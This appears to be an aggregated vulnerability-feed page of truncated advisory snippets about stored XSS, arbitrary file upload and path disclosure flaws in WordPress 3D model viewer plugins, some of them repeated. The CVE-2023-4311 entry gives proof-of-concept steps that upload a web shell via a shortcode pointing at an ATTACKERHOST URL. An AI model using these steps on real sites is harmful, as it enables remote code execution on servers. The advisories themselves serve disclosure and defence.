EUVD-2024-28479

Malicious code in bioql PyPI...

CVE-2024-30559

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Maurice Spin 360 deg and 3D Model Viewer allows Stored XSS.This issue affects Spin 360 deg and 3D Model Viewer: from n/a through 1.2.7...

CVE-2024-30559 WordPress Spin 360 deg and 3D Model Viewer plugin <= 1.2.7 - Cross Site Scripting (XSS) vulnerability

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Maurice Spin 360 deg and 3D Model Viewer allows Stored XSS.This issue affects Spin 360 deg and 3D Model Viewer: from n/a through 1.2.7...

CVE-2024-30559

CVE-2024-30559 is a cross-site scripting (Stored XSS) vulnerability reported in the Spin 360 deg and 3D Model Viewer WordPress plugin. The CVE entry notes the flaw affects Spin 360 deg and 3D Model Viewer versions from an unspecified baseline up to 1.2.7. The linked Red Hat entry reiterates the i...

CVE-2024-30559 WordPress Spin 360 deg and 3D Model Viewer plugin <= 1.2.7 - Cross Site Scripting (XSS) vulnerability

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Maurice Spin 360 deg and 3D Model Viewer allows Stored XSS.This issue affects Spin 360 deg and 3D Model Viewer: from n/a through 1.2.7...

WordPress Spin 360 deg and 3D Model Viewer Plugin <= 1.2.7 is vulnerable to Cross Site Scripting (XSS)

Software Spin 360 deg and 3D Model Viewer Type Plugin Vulnerable versions = 1.2.7 Fixed in N/A OWASP Top 10 A3: Injection Classification Cross Site Scripting XSS CVE CVE-2024-30559 Patch priority Low CVSS severity Low 6.5 Developer Claim ownership PSID 26eafe92fc92 Credits LVT-tholv2k Required...

CVE-2023-4311

CVE-2023-4311 affects the Vrm 360 3D Model Viewer WordPress plugin (versions up to 1.2.1). The vulnerability is an arbitrary file upload due to insufficient checks in a plugin shortcode, enabling potential remote code execution. Public sources in the connected records describe PoCs and demonstrat...

Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE

Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...

Path traversal

The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...

CVE-2023-5177

CVE-2023-5177 affects the Vrm 360 3D Model Viewer WordPress plugin (

WordPress Vrm 360 3D Model Viewer Plugin <= 1.2.1 is vulnerable to Sensitive Data Exposure

Software Vrm 360 3D Model Viewer Type Plugin Vulnerable versions = 1.2.1 Fixed in N/A OWASP Top 10 A5: Security Misconfiguration Classification Sensitive Data Exposure CVE CVE-2023-5177 Patch priority Low CVSS severity Low 4.3 Developer Claim ownership PSID 41f6e6c8c32c Credits Jonatas Souza Vill...

Vrm 360 3D Model Viewer <= 1.2.1 - Full Path Disclosure

Description The plugin exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode. PoC 1. Create a page 2. Place the shortcode vrm360 canvasname=s1 modelurl=SACharacter.zip aspectratio=1.8 initialoffset=0.9 on the page SACharacter.zip should be a...